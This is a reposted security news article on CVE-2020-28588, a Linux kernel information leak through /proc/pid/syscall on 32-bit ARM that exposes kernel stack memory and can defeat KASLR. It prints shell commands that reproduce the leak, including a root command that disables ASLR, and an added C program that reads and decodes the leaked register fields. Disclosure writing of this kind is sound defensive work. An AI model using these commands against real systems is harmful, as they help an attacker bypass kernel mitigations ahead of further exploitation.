The information-disclosure flaw
allows KASLR bypass and the discovery of additional, unpatched vulnerabilities
in ARM devices.
An
information-disclosure security vulnerability has been discovered in the Linux
kernel, which can be exploited to expose information in the kernel stack memory
of vulnerable devices.
Specifically,
the bug (CVE-2020-28588) exists in the
/proc/pid/syscall functionality of 32-bit ARM devices running Linux, according
to Cisco Talos, which discovered the vulnerability. It arises from an improper
conversion of numeric values when reading the file.
With a few shell commands, a local attacker can output 24 bytes of uninitialized kernel stack memory, which can be used to bypass kernel address space layout randomization (KASLR). KASLR is an exploit-mitigation technique that randomizes the addresses at which the kernel's code and data are loaded, so that an attacker cannot predict where a target lies in memory; a leaked kernel address defeats it.
Attacks also
would be “impossible to detect on a network remotely,” the firm explained. And,
“if utilized correctly, an attacker could leverage this information leak to
successfully exploit additional unpatched Linux vulnerabilities.”
Kernel-Bug Details
Proc is a special pseudo-filesystem in Unix-like operating systems that gives dynamic access to process data held in the kernel. It presents information about processes and other system information in a hierarchical, file-like structure. For instance, it contains /proc/[pid] subdirectories, each of which holds files and subdirectories exposing information about a specific process, reachable through the corresponding process ID. The “syscall” file in such a directory is a legitimate Linux file: it reports the system call, if any, that the process is executing at the moment the file is read, not a log of past system calls.
An attacker could exploit the vulnerability by reading /proc/<pid>/syscall. “We can see the output on any given Linux system whose kernel was configured with CONFIG_HAVE_ARCH_TRACEHOOK,” according to Cisco’s bug report, publicly disclosed on Tuesday.
“This file exposes the system call number and argument registers for the system call currently being executed by the process, followed by the values of the stack pointer and program counter registers,” explained the firm. “The values of all six argument registers are exposed, although most system calls use fewer registers.”
The shell commands that trigger the vulnerability are (# marks a root prompt, $ an unprivileged one; the two loops run concurrently in separate shells):
- # echo 0 > /proc/sys/kernel/randomize_va_space # only needed for a cleaner output
- $ while true; do cat /proc/self/syscall; done | uniq # waits for changes
- $ while true; do free &>/dev/null; done # triggers changes
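The following C program decodes the /proc/<pid>/syscall line format quoted above and, run on Linux, reads and prints its own entry the way the cat loop does. It is an added example written for this page, not code from the Threatpost article or from Cisco Talos. It assumes only the field layout described above plus the two other forms documented in proc(5) (“running”, and a three-field “-1 <sp> <pc>” line when the task is blocked outside a system call); the struct and function names are my own, and the sample lines in the comments are constructed.

```c
/* Added example (not from the Threatpost article or Cisco Talos): decode the
 * /proc/<pid>/syscall format quoted above. Layout per the article and proc(5);
 * the struct and function names are my own. Linux only at run time. */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct syscall_info {
    int running;                 /* file said "running": task is on a CPU */
    long nr;                     /* syscall number; -1 if not in a syscall */
    int nargs;                   /* argument slots present: 6 or 0 */
    unsigned long long args[6];  /* all six argument registers, used or not */
    unsigned long long sp;       /* user stack pointer */
    unsigned long long pc;       /* user program counter */
};

/* Parse one line. Returns 0 on success, -1 if malformed. Three layouts:
 *   "running"                       task currently executing
 *   "<nr> <sp> <pc>"                nr < 0: blocked but not in a syscall
 *   "<nr> <a0> .. <a5> <sp> <pc>"   inside syscall nr; values are 0x-hex
 * e.g. (constructed, 32-bit ARM read(2) = 3):
 *   "3 0x3 0x7ebb1cd0 0x400 0x0 0x0 0x0 0x7ebb1cb8 0x76f3a1d4" */
int parse_syscall_line(const char *line, struct syscall_info *out)
{
    unsigned long long v[8];
    const char *p; char *end; long nr; int n = 0;

    memset(out, 0, sizeof *out);
    if (strncmp(line, "running", 7) == 0) {
        out->running = 1;
        return 0;
    }
    errno = 0;
    nr = strtol(line, &end, 10);
    if (end == line || errno)
        return -1;
    out->nr = nr;
    /* strtoull with base 16 accepts the 0x prefix and leading blanks. */
    for (p = end; n < 8; p = end) {
        errno = 0;
        v[n] = strtoull(p, &end, 16);
        if (end == p || errno)
            break;
        n++;
    }
    if (nr < 0 && n == 2) {
        out->sp = v[0];
        out->pc = v[1];
        return 0;
    }
    if (nr >= 0 && n == 8) {
        memcpy(out->args, v, sizeof out->args);
        out->nargs = 6;
        out->sp = v[6];
        out->pc = v[7];
        return 0;
    }
    return -1;
}

/* Read /proc/<pid>/syscall into buf; 0 on success, -1 on failure. The file is
 * absent without CONFIG_HAVE_ARCH_TRACEHOOK, and another process's copy is
 * gated by a PTRACE_MODE_ATTACH_FSCREDS ptrace access check (proc(5)). */
int read_proc_syscall(const char *pid, char *buf, size_t len)
{
    char path[64];
    snprintf(path, sizeof path, "/proc/%s/syscall", pid);
    FILE *f = fopen(path, "r");
    if (!f)
        return -1;
    int ok = fgets(buf, (int)len, f) != NULL;
    fclose(f);
    return ok ? 0 : -1;
}

int main(int argc, char **argv)
{
    char line[256];
    struct syscall_info si;

    if (read_proc_syscall(argc > 1 ? argv[1] : "self", line, sizeof line) ||
        parse_syscall_line(line, &si)) {
        fprintf(stderr, "cannot read or decode /proc/<pid>/syscall\n");
        return 1;
    }
    /* /proc/self is read from inside our own read(2), so nr is the arch's
     * read number: 0 on x86-64, 3 on 32-bit ARM. */
    if (si.running)
        puts("running");
    else
        printf("nr=%ld sp=%#llx pc=%#llx\n", si.nr, si.sp, si.pc);
    for (int i = 0; i < si.nargs; i++)
        printf("  arg%d=%#llx\n", i, si.args[i]);
    return 0;
}
```

Run it without arguments to decode the caller's own entry, or with a PID of a process you are allowed to ptrace. The six argument slots are printed whether or not the system call uses them, which is exactly the surface the advisory describes: on an affected 32-bit ARM kernel the unused slots are where the leaked stack bytes appear.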
Security Patch Updates Available
Cisco Talos
researchers first discovered the issue on an Azure Sphere device (version
20.10), a 32-bit ARM device that runs a patched Linux kernel. It’s been present
since v5.1-rc4 of the kernel.
“Users are
encouraged to update these affected products as soon as possible: Linux Kernel
versions 5.10-rc4, 5.4.66 and 5.9.8,” according to the advisory. “Talos tested
and confirmed these versions of the Linux kernel could be exploited by this
vulnerability.”
High-severity Linux kernel vulnerabilities are not unusual. For instance, last October Google and Intel warned of the high-severity “BleedingTooth” flaw in BlueZ, the Linux Bluetooth protocol stack that provides support for core Bluetooth layers and protocols to Linux-based internet of things (IoT) devices. It could be exploited in a “zero-click” attack and potentially allow for escalated privileges on affected devices.
Source: threatpost.com

Hi, thanks for sharing, great work.